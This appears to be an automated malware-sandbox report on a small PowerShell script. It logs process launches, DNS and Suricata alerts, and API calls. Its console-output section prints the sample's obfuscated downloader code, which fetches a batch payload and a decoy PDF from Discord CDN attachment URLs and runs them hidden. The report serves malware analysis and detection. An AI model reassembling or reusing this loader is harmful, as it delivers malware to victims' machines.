Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	June 24, 2024, 3:49 p.m.	June 24, 2024, 3:51 p.m.

Size	1.1KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`19a7f5e2e7fd8e14d8129dcdf6c8b992`
SHA256	`21c2d6fa3ebf8865bbfd76ed22dffb95f587db80ab4f570a379bab75c34a8f3d`
CRC32	`A159187F`
ssdeep	`24:XMbJsZKpJsJfWI3MjxBxLABT6UvoBunqfnxDttPWAa6Oz1umAdg:sJ/pJeuI8jxBenooG98/Adg`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\pumairld.txt.ps1
2552
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\e040ju.bat'"
  2672

Name	Response	Post-Analysis Lookup
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.134.233

IP Address	Status	Action
162.159.134.233	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:59002 -> 164.124.101.2:53	2035466	ET INFO Observed Discord Domain in DNS Lookup (discordapp .com)	Misc activity
TCP 192.168.56.101:49166 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49166 -> 162.159.134.233:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49169 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49169 -> 162.159.134.233:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49167 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49167 -> 162.159.134.233:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49169 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49167 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49169 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49170 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49170 -> 162.159.134.233:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49170 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49170 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49169 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49166 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49167 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 24, 2024, 3:49 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2024, 3:49 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2024, 3:49 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2024, 3:49 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2024, 3:49 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 24, 2024, 3:49 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2024, 3:49 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 24, 2024, 3:49 p.m.			0	0

Command line console output was observed (50 out of 60 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x00000023	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x0000002f	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: At line:1 char:47 console_handle: 0x0000003b	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: + (New-Object System.Net.WebClient).DownloadFile <<<< ($oulv.Replace('zdhx','tp console_handle: 0x00000047	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: s://').Replace('yss', 'e'), $fz) console_handle: 0x00000053	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000005f	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x0000006b	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: Start-Process : This command cannot be executed due to the error: The system ca console_handle: 0x0000001f	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: nnot find the file specified. console_handle: 0x0000002b	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: At line:1 char:6 console_handle: 0x00000037	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: + start <<<< $fz console_handle: 0x00000043	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp console_handle: 0x0000004f	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: erationException console_handle: 0x0000005b	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C console_handle: 0x00000067	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: ommands.StartProcessCommand console_handle: 0x00000073	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: Remove-Item : Cannot remove the item at 'C:\Users\test22\AppData\Local\Temp\' b console_handle: 0x00000093	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: ecause it is in use. console_handle: 0x0000009f	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\pumairld.txt.ps1:1 char:795 console_handle: 0x000000ab	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: + powershell -win hidden $lbf83c=iex($('[Environment]::GetEew9t'''.Replace('ew9 console_handle: 0x000000b7	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: ','nvironmentVariable(''public'') + ''\\e040ju.ba')));$flol=iex($('[Environment console_handle: 0x000000c3	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: ]::GetEew9t'''.Replace('ew9','nvironmentVariable(''public'') + ''\\secu.ba'))); console_handle: 0x000000cf	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: function getit([string]$fz, [string]$oulv){$ff=iex($('(Nm3y7w-Objm3y7ct Systm3y console_handle: 0x000000db	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: 7m.Nm3y7t.Wm3y7bClim3y7nt).Downhjfre($oulv.Replace(''zdhx'',''tps://'').Replace console_handle: 0x000000e7	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: (''yss'', ''e''), $fz)').Replace('m3y7', 'e').Replace('hjfr', 'loadFil'));iex(' console_handle: 0x000000f3	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: sc53hdarc53hd $fz'.Replace('c53hd','t'))};getit -fz $flol -oulv 'htzdhxcdn.disc console_handle: 0x000000ff	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: ordapp.com/attachmyssnts/1232305208034463761/1252890126124585021/BysslongBound. console_handle: 0x0000010b	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: yssxyss?yssx=6673dc5b&is=66728adb&hm=b29yssbyssc868ad08aa43127yss290b9037f323b2 console_handle: 0x00000117	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: 907c544ayss871a184c32c5yss77cd8d&';$fzf=$(Get-Location).tostring() + '\\';Remov console_handle: 0x00000123	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: e-Item <<<< -Path ($fzf + $(Get-ChildItem -Include *.lnk -Name));getit -fz ($f console_handle: 0x0000012f	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: zf + 'facoe83745.pdf') -oulv 'htzdhxcdn.discordapp.com/attachmyssnts/1232305208 console_handle: 0x0000013b	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: 034463761/1252890163399364659/FASF240110.pdf?yssx=6673dc64&is=66728ayss4&hm=303 console_handle: 0x00000147	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: 958fc4fdccd86f90acb0918c0a2yssyss85yss38620a5a1dfa521yss59222yss8c216yss5&';exi console_handle: 0x00000153	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: t console_handle: 0x0000015f	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Remove-Item], PSInvalidOp console_handle: 0x0000016b	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: erationException console_handle: 0x00000177	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: + FullyQualifiedErrorId : InvalidOperation,Microsoft.PowerShell.Commands.R console_handle: 0x00000183	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: emoveItemCommand console_handle: 0x0000018f	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x000001af	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x000001bb	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: At line:1 char:47 console_handle: 0x000001c7	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: + (New-Object System.Net.WebClient).DownloadFile <<<< ($oulv.Replace('zdhx','tp console_handle: 0x000001d3	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: s://').Replace('yss', 'e'), $fz) console_handle: 0x000001df	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000001eb	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000001f7	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: Start-Process : This command cannot be executed due to the error: The system ca console_handle: 0x00000217	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: nnot find the file specified. console_handle: 0x00000223	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: At line:1 char:6 console_handle: 0x0000022f	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: + start <<<< $fz console_handle: 0x0000023b	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp console_handle: 0x00000247	1	1
WriteConsoleW June 24, 2024, 3:49 p.m.	buffer: erationException console_handle: 0x00000253	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 61 events)

Time & API	Arguments	Status	Return
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x064a17f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x064a17f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x064a17f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x064a17f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x064a17f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x064a17f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x064a17f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x064a17f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x064a17f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x064a17f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x064a17f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x064a17f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x064a17f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x064a17f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x064a17f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053cd00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ce80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ce80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ce80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ca40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ca40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ca40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ca40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ca40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ca40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ca40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ca40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ca40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ca40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2024, 3:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ca40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 24, 2024, 3:49 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 174 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0275b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05fa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05fa1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05fb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02769000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 1507328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06630000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06761000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06762000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06763000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06764000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06765000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06766000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0676a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0677b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0677c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05fa2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
